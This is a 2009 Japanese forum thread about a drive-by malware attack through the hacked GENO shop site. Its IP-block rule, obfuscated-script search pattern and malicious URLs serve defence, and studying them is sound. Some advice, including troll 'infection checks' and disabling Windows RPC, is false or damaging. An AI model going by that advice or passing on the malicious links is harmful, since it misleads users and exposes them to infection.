GENOなどのサイトでウイルス感染★8

中古PCとPCパーツの通販ショップGENO　URL略

【客の返品】GENOを語るスレ29【オク出品】
http://pc11.2ch.net/test/read.cgi/pc/1237696091/326-
326 名前：名無しさん[sage] 投稿日：2009/04/04(土) 10:43:40 0
GENOのHPにアクセスしようとしたら、Acrobat Plug-in が起動して
This operation is not allowed. と表示する。
２台試して、2台とも起きた。
もしかしてウィルスに感染してる？

前スレ
GENOなどのサイトでウイルス感染★7
http://tsushima.2ch.net/test/read.cgi/news/1239070417/

4/4　AM10時ごろ〜？からサイトにアクセスするだけで感染。
感染するとラトビアにトラフィックを飛ばします。
何を漁ってるのかは不明。

今の所は感染したら駆除できるソフトはない。
やっと一部のソフトがサイト踏んだ時に検知できるようになっただけ。
クリーンインストール推奨

・最新版のWindowsUpdateとadobeAcrobatとAdobe Flashであれば感染しない？
・ファイル作成を検出できたアンチウイルスソフトは４０のうち１０だけ。
・結論、管理もしてないようなＰＣでアクセスすれば余裕で感染する。

あちこちに短縮URLが貼られているようなので注意
発覚してないだけで他にも感染しているサイトがあるかも

(1)感染したWebページをひらく
↓
(2)感染したjsが、94.247.2.195の改変jquery.jsを実行
↓
(3)IP/UAで振り分け処理(Vistaは大丈夫そう？)
↓
(4)PDF/Flash起動。各種ウィルス本体をInternetTempに展開
↓
(5)bufferOverrunでウィルス本体の起動を試行

感染した場合
パスワードなどの個人情報が抜かれている可能性あり

いつものバックドア系ウイルスなんだけど、今回なんか変だな
・PDFファイルとかシステムファイルがなぜか増殖する
・メモリを馬鹿食いする
・再起動時にブルースクリーン

とりあえず、駆除せずに再起動したら帰ってこれないかもしれないな

対策

WindowsUpdate
PDFリーダーを最新にする　（AdobeReader　や Foxit Reader）
AdobeFlashを最新にする
94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
Javascriptを切る
スレに貼られている怪しいリンクは開かない(GENO、juicyrock、短縮URL)

GENO終了

まだなってんのかよこれ

ゲノサイト

さっきアクセスブロックしてくれた
Vistaだが感染していたらしょうがないな
最近ブラウザ落ちまくりだが、メモリーは食わないし
ブルースクリーンでないからあきらめるわ

げの

524 ： シンフィアンドラ・ザンゼグラ(アラバマ州)：2009/04/07(火) 02:37:04.72 ID:aXhN0DBC
踏んで構わんマシンで踏んだ後でカスペのオンラインスキャンやってみた結果。
IEのテンポラリに残ってた。
jquery[1].js　感染：Trojan-Downloader.JS.Agent.dwf
A0G6M8XZ\Vy[1].pdf　感染：Exploit.Win32.Pidief.aog

Avast!は最新版でも、このファイルを検出しなかった。
Avast!入れてて安心してる人はカスペでもスキャンしてみるといいかも。
どなたかの参考になれば幸い。

avast!最強伝説終了

現在まで駆除を確認したソフト

Norton、AviraAntiVir、Kaspersky

avast!がブロックしたのはまさにマグレだったんだな。
なんだか残念な気持ち。

まだやってんの？

【対策】
WindowsUpdateを行う
Adobe Reader/Acrobat/Flash Playerを最新版にする。

火狐+Adblock Plusのやつは
*/94.247.2.195/*
をブロック要素の追加。

検出できるソフト一覧
●a-squared 　　　　4.0.0.101
　2009.04.03 Trojan-Spy.Agent!IK
●Avast 　　　　　　4.8.1335.0
　2009.04.03 Win32:Daonol-L
●eSafe 　　　　　　7.0.17.0
　2009.04.02 Suspicious File
●GData 　　　　　　19
　2009.04.03 Win32:KillAV-KS
●Ikarus 　　 T3.1.1.49.0
　2009.04.03 Trojan-Spy.Agent
●Kaspersky 　　　　7.0.0.125
　2009.04.03 Backdoor.Win32.Agent.afhg
●McAfee+Artemis 5573
　2009.04.03 Generic!Artemis
●Prevx1 　　　　　V2
　2009.04.03 High Risk Cloaked Malware
●Sophos 4.40.0
　2009.04.03 Mal/Generic-A
●TrendMicro 8.700.0.1004
　2009.04.03 PAK_Generic.001

各ソフトの対応状況が大事

でも亜種出てるのか・・・
どうしようもないじゃん

>>9
脳�dは駆除できたのか
それでやっとアクセスブロックされたのか
昨日まではスルーだったからな

ウイルス感染が気になるなら、これをまず使え

Process Explorerでプロセス確認
窓の杜 - Process Explorer
http://www.forest.impress.co.jp/lib/sys/wincust/taskservice/prcsxplorer.html

ネットワークで変なサイトにアクセスしてないか、TCP Monitor Plusで確認
窓の杜 - パケットの情報やセッション状況をリアルタイムで監視「TCP Monitor Plus」
http://www.forest.impress.co.jp/article/2003/01/22/tcpmonitorplus.html

休日出勤した挙句、会社のPCに感染させた人はどうなったん？
会社を辞めたとかいうレスまで見た

おまえらデフォでjavascriptを有効にしてるなｔね恐ろしいことしてるんだな…

つまりPDF開けない環境が勝ち組だったってことでFA？

自分で貼っといて言うのもなんだけど>>12って正しいの？
ちなみに前スレからのコピペな

まだやんのかよ

エロマンガ貼りまくってたキモヲタが会社のＰＣに感染させてクビになったってマジか？
すげーウケルｗｗくせえZIP厨が減って最高だわ

>>17
javascript有効にしていないとgenoの特価品見れないじゃん

今から[email protected]にメールしてくる。
ここであってるよな?

>>23
ウイルスを添付されたメールが返ってきそうｗ

>>24
俺もそんな気がするw

ウイルスバスターで駆除できる？

>>19
古くね？PAKとかも入ってるし初心者は混乱するかと
検体別にまとめてほしいね

会社がﾈｯﾄ制限かけてない時点で会社の負けだな

>>23
ガン無視ってレスをどこかで見た

>>23
ラトビアに乗っ取られるぞｗ

いまさっき来たバスターのアップデートでやっと検知出来た
これって隔離されたけど、これまでの時間の漏れとか
今後とか安心なの？

http://www.vipper.org/vip1174152.jpg

それにしてもgenoってふざけてんな。放置しすぎ

これ駄目だね　企業として間違いなく終わった

ウィルスセキュリティを愛用する俺に隙はなかった

こりんごって何だよ

genoで買い物しても個人情報抜き取られて色んな請求書が届きそう

>>19
ノートンでさっき検出した

リスク名はDownloaderだが、
ファイル名がjquery[1].jsだからそうだと思う

>>23
開封通知わすれんな

リアルウイルスセキュリティ0　GENO

刑事事件とかになってほしい

XGA、IE、ギコナビ、トレンドマイクロ・・・

ギコナビ使いに悪人はいねぇ

>>38
サンダーバードだと
オプションの開封確認の返答を求める　でいいのかな?

>>35
PCに実名とか入れねーよｗ

これ感染するとどうなるの？

Avast+制限付きサイトでためしに開いたんだが感染してるかな・・・

おもしろそうだからさっさと吊るし上げろ

>>35

ゆうこりん
＋
りんご星（ゆうこりんの星）
＝
こりんご

送信　ポチ。

【開くな注意！】
tp://qr.quel.jp/form_bsc_url.php

ここ開いたらカスペルさんに怒られたんだが・・・

今は感染しないはず…だけどなあ

また改竄されてたりしてｗｗｗｗｗ

これはひどいｗｗｗ

ノートン先生がんばったな

下手にバスターの設定いじったせいか、ファイアウォール有効だと
ネットに接続できなくなった
無効にしてWindowsのファイアウォールに切り替えたが、大丈夫かね…

Vista+Firefoxの俺に隙はなかった

高い重い２ちゃんログを誤検出する為、貧乏なちゃねらーには評判悪い
ノートン先生だが、なんだかんだいって頑張るな

なんかパスワードとか抜かれてるのかな
全ての登録パス変更するのめんどくさい・・・

>>50
民間企業Finjanによるマルウェアを含むサイトのブラックリスト
http://www.aguse.jp/?m=w&url=http%3A%2F%2Fqr.quel.jp%2Fform_bsc_url.php&x=0&y=0

>>56
Norton使ったことないけど、除外設定とかないのか？

>>42
うんうんｗ

ぴんぽ~ん♪

何故メンテ中なのかを告知しない最低企業ジェノｗ

危険ポートを閉じることでセキュリティを強化する。

【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下：DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。

ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。

ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。

Web-based DNS Randomness Test | DNS-OARC
https://www.dns-oarc.net/oarc/services/dnsentropy

を踏んでみて、もし万一「POOR」って表示されたら、
そのDNSはセキュリティ的に「もうだめぽ」ということ（笑）

>>56
クレカ強制継続と公式掲示板削除、
USBメモリワームとキンタマ検出できなかったのが原因かと

>>62
おお？全部GREATだった

http://p.asks.jp/ex.jps

>>59
あるよ。
手動になるけど、専用ブラウザのログ保存先のフォルダを検出除外すれば大丈夫。

>>51
おれはGENOは行っていないので他のサイトで感染（感染未遂かもしれない）
パケットキャプチャしていないが状況から判断して
アフィリエイトが貼ってあるサイトで起きてるらしい


ここ２週間の状況

Vista
IE7　　　　固まることあり（原因は違うかもしれない）
火狐　　　落ちることあり
メモリー　問題なし
再起動　ブルースクリーンなし
システムフォルダ　改ざんなし

こんな状況でも今日商品のページが更新されてるんだけど。

それってどうよ？

グーグルで検索かけると検索結果出てくる前に固まるんだけど
このウイルス関係してんの？

>>68
genoは神

>>62
全部GREATだった

>>66
だよなー。ないとかないよなー

>>66
自動で2chのログ除外したら怖いわｗ

>>68
クーロンみたいなので数日分纏めて事前に登録されてて
時間になったり掲示してたのが売り切れたら差し変わる様に
自動更新されたりするんじゃないのかな。

http://ja.uncyclopedia.info/wiki/GENO%E3%82%A6%E3%82%A4%E3%83%AB%E3%82%B9
どんどんまとめていってねー

新品のCore2パソ届いた！！！！！！
ちゃんと新品でNECの保証書もあるし助かった。
このまま騒ぎが大きくなったらと思うとガクブルだった。

新しい更新来たけどAVGは未だ駆除出来ないの？

>>58
おぉサンキュ！このサイト前に無くなったと思って行ってなかったが復活してたんだな

>>62
カスペルさん切ってもオールグレイトー！・・・・・

>>76
多分汚染済み

>>9
やっぱりAntiVirsが最強だな

>>78
aguseは判定ボタンが無くなったのが残念だな。

>>67
不安だったらアフィサイトで使ってるjavascriptファイル全部抜いて

document.write(unescape('%3C4x4sWXkcr4

で検索してみろ
ヒットしたらそのサイトはGENO2号だ！

>>73
ウイルス検出の９割が２ｃｈログ
愛知とかコード貼っているやつのがほとんどだろうが

カスペは感知したか？

アンチウイルスソフトはほとんど関係ないだろこれ。
とっくの昔にセキュリティパッチが提供されてた既知の脆弱性を、
アップデートせずに放置してるっつーのがありえない。
きちんとソフトをアップデートするのが最初のステップで、
それすっ飛ばしてアンチウイルスソフトを導入するだけじゃ意味ないよ。

>>82
unescapeする文字列入れちゃダメだろ。サイトごとに違うんだから。

一番いいアンチウィルスソフトって何？フリーのみで宜しく

>>62
SANNET
GREAT
GREAT
GREAT
GREAT

まだ感染するのか？
ここまで放置してたらＧＥＮＯが訴えられても仕方ないね

【緊急警報】GENOなどのサイトでウイルス感染（２ちゃんに貼られた不明なリンクへも飛ぶべからず！！）
http://pc11.2ch.net/test/read.cgi/pcnews/1239034325/

>>87
ゆとりかお前はw

>>62
GREAT
GREAT
POOR　＼(^o^)／
GREAT

たぶんだけど、GENOの中の人メールとか見てないっていうか
メールサーバーごと、鯖管理会社に渡してるんじゃね?

>>82

２号を見つけようとしているが、アフィがランダム表示みたいでわからん
時間帯かもしれないし、さっき削除は１３時だが起床したばかりだからノートンのアップデートで検出したのかもしれない

IEが固まるのは、Yahooかニコニコのどっちか
火狐が落ちたのは、１８禁サイト

ん？何かあちこちで短縮とスレが立ってるのは気のせい？

>>87
キングソフト

やべ感染した

geno最高や！上海問屋なんて最初からいらんかったんや！

>>95
こういうのがあるぐらいだから面白おかしくやるんだろうな

★090406 複数板｢ウイルスGeno短縮URL｣誘導マルチポスト荒らし報告
http://qb5.2ch.net/test/read.cgi/sec2chd/1238968073/

adobeのソフト全sakuで対策余裕でした

>>15
Process Explorerで何が見つかるとやばいの？

>>100
adobeは悪くねーだろ

>>62
ばかじゃねーの

つーかバッファオーバーフローの脆弱性ってかなりヤバいんじゃないの？
XPなんて管理者権限で使ってる人多そうだし、感染してたら何されるかわかったもんじゃないでしょ。
今回のマルウェアが具体的に何やるのかわかってない以上、フォーマットして再インストールするしかなくない？
駆除とかで済むもんなのかな？

とりあえず
file://localhost/C:/
これをブラウザのアドレスバーにコピペしてCドライブの内容が見えたら
再インストールも視野に入れたほうがいい

>>102
いや、今回の騒動はadobeが悪いだろ。

>>105
見えたーウイルスに感染したー（棒読み）

>>107
あとは
コマンドプロンプトて
netstat　　
と入力して
bananaとかtigerとかいうサーバーが見れたらアウトだな

なんとかして他のせいにしようとしてるＧＥＮＯ社員必死だな(棒

ＰＣ初心者だと　どこまで信用するんだろうか

>>99
それっぽいね、発信源ソースは。

GENOは被害者かもしれないけど改ざんされてから放置期間が長すぎる。
これって被害を拡大させた一員だし、商売やっている以上速やかに対策する義務があるんじゃないの？
なんか、過失って事で損害賠償とか責任とかあるような気がする。
あと、なんらまともなアナウンスなし。もうすこしまともな対応してほしい。
コンプライアンスや非常時の対策まったく駄目だと思う。

>>101
HijackThis で観れば

実行中のprocessesや、BHO、レジストリのHKLM\..\Run、Serviceなんかも分かるよ

GENOはまだウイルス垂れ流してんのか？
だとしたら救いようのない糞企業だな

ウイルス感染してから長期間放置
メンテ後の報告は、小さな画像ファイルで
サーバーに一部不都合があった、スイマセンｗｗｗｗｗｗ、のみ（実は直ってない）
指摘され再びメンテするも、TOPページのみ変更してサーバーは稼動中
むろん商品閲覧可能、感染も可能


　　　Ｇ　Ｅ　Ｎ　Ｏ　は　ネ申

もちろん改ざんする奴が一番悪いんだろうが
GENOの対応の最低っぷりにもあきれるな
ネット使って商売する資格ないだろ

http://www.geno.ne.jp/ribbon/BIJOU400pcjquery.js

なんだまだなんも動きないのか

GENOは土曜の時点か遅くとも日曜にサーバー閉じてれば
被害者で済んだだろうけど
散々指摘されてるのに
対策も取らずに該当するファイルだけ削除して
サーバー開けちゃってる時点で被害者から共犯者に変わってしまってる

しかも、
ウイルスに対するアナウンスも無し
この時点で共犯者から加害者に変わってるかもしれん

genoの５００円mp3プレイヤー欲しかったのに
しばらくHPアクセス出来んな

　　　　　　　　　　　　　　安物買いの銭失いワロスｗ

>>120
入院用に欲しかったが他で買ったよ。

煙のないところに火はたたないっていうだろ。
GENOに恨みある連中の仕業としか。
まぁやられて当然な事してんじゃない？

PC通販ショップ「GENO」のサイトが改ざんされ、サイトを閲覧した場合にウイルス感染の危険がある状態になっていたという情報が、
ネット上の掲示板などで話題になっているほか、弊誌にもメールで情報が寄せられている。
現在、「GENO」のサイトは「臨時サーバーメンテナンス中」という形で通販業務を停止している。

ネット上で話題になっている内容などを総合すると、4月4日ごろにGENOのサイトが改ざんされ、Flash PlayerやAdobe Readerの脆弱性を悪用して、
ユーザーPCにウイルスを感染させようとする状態になっていたと見られる。

GENOに確認したところ、「サイトにアクセスした際に、勝手に海外のサイトに接続される」といった問い合わせが多数寄せられたため、
7日に「サーバーメンテナンス中」という形で通販サービスを停止。現在システム会社にサーバーの検査を依頼しているが、検査結果が帰ってきていないため、
ページの改ざんやウイルス感染の危険性などについては、現時点では確認できていないという。GENOでは、検査が完了次第、詳細を報告したいとしている。

http://internet.watch.impress.co.jp/cda/news/2009/04/07/23057.html

>>108
うわーやばーいたいへーんあうとだよー

>>123
そういう問題じゃないです

mp3プレイヤーなら
http://kakaku.com/item/01308112188/
これ買えよ、例え500円でも屑プレイヤーなら捨て金だろ

>>120
尼で売られてる2100円のZENStoneが良いと思うが

面倒だからバックアップとって寝かせてたHDDにwindowsインスコした
全体の動作が無茶苦茶軽快になった

>>127
おおう、噸
感染しないよね？

数日前に朝日新聞が１面使って広告を掲載していたな
もしかしたらグルだったのか?

つかまだどんなウイルスかわかってないのかよ

アンチウイルスソフトは使っているけど、ファイアウォールソフトは使っていない。
つか、必要なのかな？
フリーでオススメはなんかある？

ウイルス対策入門：ファイアウォールで外部からの攻撃をブロック :教えて君.net
http://www.oshiete-kun.net/archives/2009/04/06viri4.html

これなんかは使えるの？

>>130
しないしないｗ
ただ何処で買うかによっては知らんけど
価格com見るだけなら無問題

俺も愛用してる　4980円で買ったけど・・・
音は文句無い

結局楽天とかはセーフだったの？

結局感染確認方法はなんなのかな。
cmd使ってない、またはcmdを使うプログラムが
ないのにconime.exeが活動してたらアウト？

>>133
outpostって更新が終ってたような・・・・

>>130
価格コムで感染したら今頃大騒ぎになってるわｗ

ちなみにオマエは↓買ってろ
http://www.amazon.co.jp/dp/B0012M4U1K/

>>136
スキャンしようよ

閉店セールまだかよ

FWって性能いいとされてるようなのは大抵細かい設定が必要だろ
素直にZAだの総合セキュリティソフトのFW入れとけって

>>134
見てきた。
あまり評判よろしくないのね。
情報�d�d

>>133
よくわからないならおとなしく製品買ったほうがいい
わけもわからず設定したら結局ザルになるよ

>>136
簡易検査ソフトうｐされてたなそういえば

>>120
メーカーのサイト見たらドンキとかで購入した人は保証ないみたいだね
GENOで買っても同じ目にあうんじゃないかな

今どーなってんの？

GENOを利用したこと無かったが
ココまでイイカゲンだと通販でトラブル起きても
「トラブルなんて知らないよ♪」
で済まされそうだなｗｗｗ

>>133
PC Tools使え英語でもいいならCOMODO

今踏んじゃった
サーバメンテ中だったんだが感染してるのか？
取り合えずオンラインスキャンしてみたが反応無し
で、何がどうなるウイルスなんだ？

>>138
以前価格コムが同じように改ざんされた時はNHKのニュース7でも報道されたしな

>>133
前に雑誌かなんかでzonealarm薦めてたな
使ってないから知らんが

>>138
そういやいつだったか価格.comもそんな騒動あったな

>>149
TOPはセーフ

>>145
いくらなんでもたかだか500円の品にメーカー保証を求めても不毛だろｗ
それこそ北京語や広東語が堪能な奴以外には無意味な保証だと思うぞｗ

クレカ使えないようなサイトは信用できない

システム要件

カスペルスキーオンラインスキャナ 7.0 が正常に稼働するためには
コンピュータが次の要件を満たす必要があります：

30 MB 以上のディスク空き容量
Microsoft Windows 2000 Professional SP4、
Microsoft Windows XP SP2 32ビット/64ビット、
Microsoft Windows Vista 32ビット/64ビット:
Microsoft Internet Explorer 6か7、Opera 9、あるいはFirefox 2
Ubuntu 7.10: Firefox 2
Sun Java SE Runtime Environment (JRE): Microsoft Windows Vista、バージョン1.6.0以上;
その他のOS、バージョン1.5.0以上
JavaおよびJavaScriptがウェブブラウザで使用できること

カスペルスキーオンラインスキャナは、XP　SP３では、使用できないことでFA?

>>149
ラトビアと通信するらしいんだが、実はまだよく解ってない

>>155
XP、SP３で先日検査できたぞ

>>152
なん…だと…

>>139
どうやらカスペでスキャンできるみたいだね、やってみる。

>>152
サンキュウ、安心して寝よう

>>155
今、まさにスキャンしてる最中だけど、今のところ問題ないよ

COMODO はちゃんと設定しないとザルになるからﾈｯﾂ初心者はやめとけ
PC Toolsで十分

これからはこんな事態が起きてもすぐに対処出来るように、
regseekerを入れて使い方を一通りマスターしておくべきだな。

ZONE Alarmは初心者でも扱えるのに性能いい。
ただしProだけかもしれない。

百歩譲って改竄されたのは被害者で仕方ないとしても、その後の無責任
極まる対応の積み重ねは弁解の余地もないな

>>164
良くねーよ
proでやっと並の上程度だろ

AdobeにむかついたのでPhotoshopCS4Extendedの割れをインスコした

GENO終了のお知らせ

新品→上海問屋
中古ジャンク→電脳売王

outpost1.0を使っている俺のセキュはザルなんだろうなー
更新あるのがいいよねやっぱ

>>162
うんうん。

無知なお馬鹿さんが背伸びして無駄に高機能なファイアーウォールを導入した所で
まともに設定して使いこなせなければ、geno状態になるからねｗ

猿でも使えるWindowsFirewallとWindowsDefenderを普通に使った方がマシってレベル。

>>168
売王は発送対応が糞だからｗ
オレの場合はこうだが
新品→NTT-X
雑貨→DealExtreme
中古→祖父

そういや価格コムの騒ぎでNOD32の名前を知ったな

>>155,161
自分のPCは、
「カスペ７．０を正常に動作するためのシステム要件を満たしていません。」
という表示が出て、
その上の概要の
OSの種別
Windows　XPという文字が赤字なので
XP　SP３だとスキャンできないのかと思っていたのですが
どうしたいいのでしょうか？
IE6、JAVA１．６、ｘ８６です。

もう不安で堪らないし疲れたからOS再インストール中。
短縮URLをNGに追加してたら踏んじまった、情けねぇ

>>173
他がたりてないんじゃね

702 名前：ひよこ名無しさん[sage] 投稿日：2009/04/07(火) 20:11:04 ID:???

簡易感染チェック

Ctrl+Alt+Deleteでタスクマネージャ出して、プロセスのとこで
「イメージ名」でソートして、svchost.exeのユーザー名を確認。
んでNETWORK SERVICEってなってるとこが2つあると感染の危険性大。
さらにSystem Idle ProcessのCPUが90以上だと完全アウトだね。

>>134
>>138
この事件忘れたの？

大手サイトの「４つのやりません宣言」　サイバーノーガード戦法を超えた必殺のサイバークロスカウンター！
https://www.netsecurity.ne.jp/1_2937.html

検索候補にﾜﾛﾀ
ttp://search.yahoo.co.jp/search?p=geno&search.x=1&fr=top_ga1_sa&tid=top_ga1_sa&ei=UTF-8&aq=&oq=ge

>>171
NTT-X は液晶モニタ安いよね、送料も無料が殆ど
電脳売王 は小物は運賃高くつくけどね、今PenMノートが安いよ
上海問屋 はコネクタが光るケーブルやHDDケースが安かった
CASIOのG-Shockが安いけど、国内保証つかないんじゃないかな

　「大変です！　サイトが改ざんされて個人情報が盗まれた可能性があります」
　「利用者からのクレームに対応しきれません」
　「新聞社から取材依頼がきてます」
　「サイバークロスカウンターで対応しろ！」
　「了解です。監視という名目で改ざんは放置します」←今ココ
　「よし！　ダブルクロスカウンターもやれ！」
　「漏洩した情報は個人情報に該当しないと言い張ります」
　「適切な対策を施していたので当社に過失はないと言い張ります」
　「トリプルクロスカウンターだ！」
　「被害者への補償は一切しないと堂々と発表します」
　「ポリシーのないセキュリティ業界有名人に調査依頼をかけます」

検索URLでも
★090406 複数板｢ウイルスGeno短縮URL｣誘導マルチポスト荒らし報告
http://qb5.2ch.net/test/read.cgi/sec2chd/1238968073/
に貼ったらBANできるんじゃね？

>>181
無理。お前そのスレ見てみろよ

最近ブラウザが糞重くて落ちるんだけどもしかしてウイルスなのか？
ちょうど初スレが立ち始めた頃から症状が出始めたんだが

>>176
釣りにしてももうちょっとまともに作れよ
System Idleが常時90未満ってそっちの方が色々とまずいだろ

＞14時50分頃、ネットでしかいきがれないカス(通称2ちゃんねらー)が電話したが、GENOは電話にでないという。

余計なお世話だ、アンサイクロ野郎ｗｗｗ

そろそろマスゴミも取り上げても良さそうな気がするが
実際に何が起こるのか分かってないとなんともしょうがないな

>>183
そんなの誰にもわからないからスキャンしようね

このウイルスを使うことで誰が得してんの？ウイルス開発者？

土日に親切なねらーが実店舗で告げたそうだよ
帰ってきた言葉はお決まりの「ネットショップのことは分かりません」だってさ

>>157,175
Cドライブの空き容量が１．８GでOKだと思うのですが、
どうなんでしょう？
JaneでGENOのリンクをブラクラ登録しただけなので
たぶん大丈夫じゃないかなと思っているのですが。

>>188
たとえばゾンビPCにしちまえばゾンビPCマーケットで売れる

個人情報はどうだろうな
メールアドレスはスパム用においしいのかもな
クレジットカード番号はあったらおいしいけどどうかなあ

>>173
流石にそれはカスペに聞いてくれとしか言えないんだが……
とりあえず、こっちの環境を書いておくと、
IE8、Java1.6.0_13-b03、x86 WinXP Pro SP3
しかし、完全スキャンは結構な時間かかるなぁ。

>>190
少なすぎる

原因ではないだろうが確かに少なすぎだな
さすがにそこまでいくと、速度低下起こすぞ

>>190
1.8GBって結構少ないけど30MB以上ってなってるから大丈夫そうだね
あとはOSが最新じゃないとかJREが古いとかかなあ
それぞれ最新に更新してから試してみればいいんじゃね
あとブラウザキャッシュクリアも試してみてね

ハッカー大会が有るようだから
その関係だろうな

ハッカー大会自体は真面目な内容らしいが
毎回、その前後にウイルス被害が拡大してるようだし

Cドライブは少なくとも全容量の半分以上空き作っておかなきゃ
一番神経質になるドライブなのに

>>188
世界で今一番抜かれてる動画が解る。

>>192-195
いろいろとありがとうございます。
すこしずつ試してやってみます。

ここ三日間、avastでもカスぺオンラインでもバスターオンラインでも検出されなかったがもう
感染してないってことでいいよな…　もう疲れたよ…

>>31
こりんごさん、こんばんは

斧のURL踏んだはずなのに違うサイトに飛んだからすぐ閉じたんだけど
これだけでもう感染してるの？

>>198
つ 一本道のHD高画質がｵｽｽﾒ（4000kbps）

>>201
バスターは、日本にラボがあるから初心者には本当に心つおいな

>>202
ご愁傷様

>>188
ボットネットのハーダーでしょ

>>204
おれのESSはいつ対応してくれるんだろう・・・

ＧＥＮＯ、被害届けを出してないんじゃないのか？
利用者をなめているとしか思えない。。。

>>202
何処で踏んだのさ？
リンクいらんからスレ名とレス番教えてほしい

>>200
昨日カスペとトレンドマイクロのオンラインスキャンを両方かけて感染無しだったが
夜中にa-squared 　の完全スキャンをかけたまま寝て、あさおきたらTrojan-Spy.Agent!IK がありましたと出た。
普段はＡＶＧなので当然未対応　orz
ちなみにgenoや怪しいＵＲＬは全く踏んでいない。

何を信じたらいいのかわからん。

>>199
ＳＰ３でＣドライブ残量１．８Ｇだけど今スキャンし始めた

＞ちなみにgenoや怪しいＵＲＬは全く踏んでいない。

ﾜﾛﾀ馬鹿かおまえ

あ、オンラインスキャン後は怪しいＵＲＬは全く踏んでいないに訂正。

ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!

ウイルスバスターとかノートン先生よりネタ扱いされるアンチウイルスソフト

ｷﾀ*･゜ﾟ･*:.｡..｡.:*･゜（ﾟ∀ﾟ)ﾟ･*:.｡. .｡.:*･゜ﾟ･*!!!!!

>>210
覚えてない
ロリコン自重汁のスレだったか、もう1000いったエロ漫画家の話題で盛り上がってたスレのどっちかだったような気がするけど
ついさっきこのスレ開いて今回の騒動知ったから、そのときは気にしてなくて記憶にないんだよね…

ﾗ━━━━━━ヽ(´∀｀ヽ)━━━━━━ﾝ !!!!!

ｺﾈ━━━━━━(＞△＜)━━━━━━ !!!!!

>>211
>>12のリストの一番上に、>>211のトロイの名前があって流石にワロタ

引っかかったファイルをもう一回、カスペにかけて見ればいいんじゃね？
部分チェックなら早く終わるだろ。

ｺｫ━━━━щ(ﾟДﾟщ)━━━━ｲ!!!!

>>107
そのアドレスをスレイプニルのアドレスバーに入力すると私のCドライブの中身が見れてしまいました
これはインターネットから私のパソコンのデータがが丸見えと言うことでしょうか
助けてください！

Cドライブがデフラグできない真っ赤かになったよありがとう
おかげで丸１日かけてソフト入れなおし

>>218
datとかは？

GENOCIDEアナザーを正規ハードAAAでワンモア出ます

GENO ２−３日放置してたんだから被害者であるが加害者だわ。

やっとカスペのオンラインスキャンが始まった。
50MBくらいなのにDBの更新に1時間以上かかった。

>>218
じゃいいや
短縮アドレスはわかるけど偽造？がよくわからんから見たかっただけだし

ロリコン自重は>>64に斧偽装→ゲノがあるな

>>224
かなり初期にそういう報告があったね
無数にPDFを開こうとする際に領域確保だけしまくるのか
わからんけども
ついでに今後はソフトを最新のものにアップデートするように心がけてね

9時だぞ日替わりセール見に行かなくていいのか

斧偽装みたことないんだよなあ

>>232
どうぞどうぞ

>>230
わかったわｔｈｘ
どうみても短縮じゃないか
斧っぽいとか興奮してドメインちゃんと見てないのか

今日セールらしいけど、これでまた感染者呼ぶの？

vistaでavastさんなんだが
感染してるっぽい
でもどうすればいいのかまったくわからん＞＜

>>230
ああそういうやり方か
斧っぽいアドレスで飛ばすんかと思って気になってたｗ

>>236
すべてgenoの計画通りです

>>237
何に感染してるの？

カスペで完全スキャンしてウイルスらしいものは検出されなかったんだけど
感染してないと考えていいの？

>>240
GENO開いちゃった

Vistaは大丈夫、っていう話だけど
今回のウイルスの特徴からいえば何ら根拠なくね？

>>243
どんな特徴なのか説明してくれ

実はデスクトップ画像を集めるだけのウィルスだったりして
作者も祭りになっててビックリ

それならむしろ作者が集まった画像のZIPうｐでおｋ

Spybotやアンチウイルスソフトがまったく起動できずに
windowsupdataもできない、オンラインスキャンもまったく役に立たない
HijackThisでも痕跡がまったくない
そんな奴はComboFix、地味に１回まじで助かった

>>242
OSいれなおせばいいとおもうよ
>>243
UserAgentで判断してるかもっつー話があったから
VistaでもUA偽装してたら意味ないな

ウィルスバスタ　pupup[1].js TROJ_GENOME.BK
検知したんだが

IEの履歴を見るとgenoは3/31が最終アクセスだった
これって感染してるの？　どうしよう

adobeAcrobatとAdobe Flashに感染させて.exeを置くステルスタイプだから
別段VistaとXPじゃ変わらなくね？っていう話

２スレ目にこんなのあったけど同じ体験した人いんの？
510 名前： シンビジューム(大阪府)[sage] 投稿日：2009/04/05(日) 16:34:02.94 ID:G8VueaaE
avast!で知らずに踏んだらAcrobat勝手に立ち上がったと思ったらavast!が警告出した。
ファイルを移動させて確認するとdosのコマンド？らしきファイルとEXEの二つのファイルが隔離されてた。
改めてそのそのファイルを検査すると警告がでた。
気持ち悪いのでavast!のフルスキャンかけたら、当然のごとく移動したファイルで警告出したから削除。

プロセス確認するもcmd.exeもconime.exeの起動もなし。
なんかすっきりしねぇ。

まだウイルス放置してるの？

カスペルのオンラインスキャンで、
\Temporary Internet Files\Content.IE5\K5I3G5A3\jquery[1].js に
感染：Trojan-Downloader.JS.Agent.dwf　が見つかったんで
インターネット一時ファイル削除してもう一回スキャンしたら
感染：Trojan-Downloader.JS.Agent.dwf　は出なくなったんだけど
これって発症はしてないってことでいいのかな？
adobe reader/flashは最新版だったし

>>243
UAをNT 5.1にしたら感染したって話もある

なんか、今回のウイルスは一枚岩とは行きそうにないんだよな
いろいろごっちゃになっていてどうなってるか3日経った今でも分かってない

>>249
バスターは関係無いのまでGENOと誤検出するようだから
他のでチェックしてみた方が良いよ

avast noscript vistaの俺は大勝利をおさめたといったところか・・・
池田先生万歳

>>249
それ誤検出じゃなかったっけ？
